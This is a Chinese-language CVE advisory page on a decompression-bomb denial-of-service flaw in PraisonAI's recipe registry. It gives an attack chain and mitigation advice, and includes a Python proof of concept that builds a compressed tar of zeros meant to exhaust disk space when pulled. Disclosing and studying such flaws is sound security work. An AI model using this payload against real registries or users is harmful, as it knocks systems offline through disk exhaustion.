CVE-2026-40148 CVSS 6.5 中危

CVE-2026-40148 PraisonAI拒绝服务漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40148

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PraisonAI

漏洞概述

PraisonAI在4.5.128之前的版本中存在安全漏洞。其配方注册表中的`_safe_extractall()`函数虽然验证了路径遍历攻击，但未对解压缩成员的大小、累积提取大小或成员数量进行检查。攻击者可发布包含高压缩率数据（如10GB零数据压缩至10MB）的恶意配方包，当受害者通过`LocalRegistry.pull()`或`HttpRegistry.pull()`拉取时，会导致磁盘空间耗尽。

技术细节

该漏洞的根源在于PraisonAI处理压缩包时的逻辑缺陷。虽然代码中存在防止路径遍历的机制，但缺乏对解压缩资源的限制。由于某些数据（如全零字节）具有极高的压缩比，攻击者可以构造一个体积小但解压后巨大的恶意tar文件。当受害者调用受影响的方法拉取并解压该文件时，系统未对解压后的总大小进行校验，直接执行`tar.extractall()`。这会导致大量数据瞬间写入磁盘，耗尽存储资源，造成拒绝服务（DoS），严重影响系统可用性。

攻击链分析

STEP 1

1. 构造恶意包

攻击者创建一个包含高压缩率数据（如大量零字节）的tar压缩包，该包体积很小但解压后极大。

STEP 2

2. 发布恶意包

攻击者将此恶意配方包发布到PraisonAI的注册表中，诱导受害者使用。

STEP 3

3. 触发拉取

受害者使用受影响版本的PraisonAI，通过LocalRegistry.pull()或HttpRegistry.pull()拉取该恶意包。

STEP 4

4. 执行解压

程序调用存在漏洞的_safe_extractall()函数，由于缺少大小校验，直接将文件解压，导致磁盘空间被耗尽。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import tarfile
import io

# Create a malicious archive (Zip bomb / Decompression bomb)
# This script creates a tar file containing a file with a large amount of zeros.
# When extracted, it consumes significant disk space.

def create_malicious_tar(output_filename):
    # Create an in-memory byte stream
    with io.BytesIO() as stream:
        with tarfile.open(fileobj=stream, mode='w:gz') as tar:
            # Add a file containing 1GB of zeros (sparse file concept or just zeros)
            # Note: In a real exploit, this would be much larger (e.g., 10GB)
            data = b'\x00' * (1024 * 1024 * 100) # 100MB of zeros for demonstration
            info = tarfile.TarInfo(name="large_file.bin")
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        
        # Write the compressed stream to a file
        with open(output_filename, 'wb') as f:
            f.write(stream.getvalue())
    
    print(f"[+] Malicious archive '{output_filename}' created.")

if __name__ == "__main__":
    create_malicious_tar("malicious_recipe.tar.gz")

影响范围

PraisonAI < 4.5.128

防御指南

临时缓解措施

在升级前，建议严格限制配方包的来源，避免从不受信任的注册表拉取数据。同时，监控系统的磁盘使用情况，以便及时发现异常的空间占用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表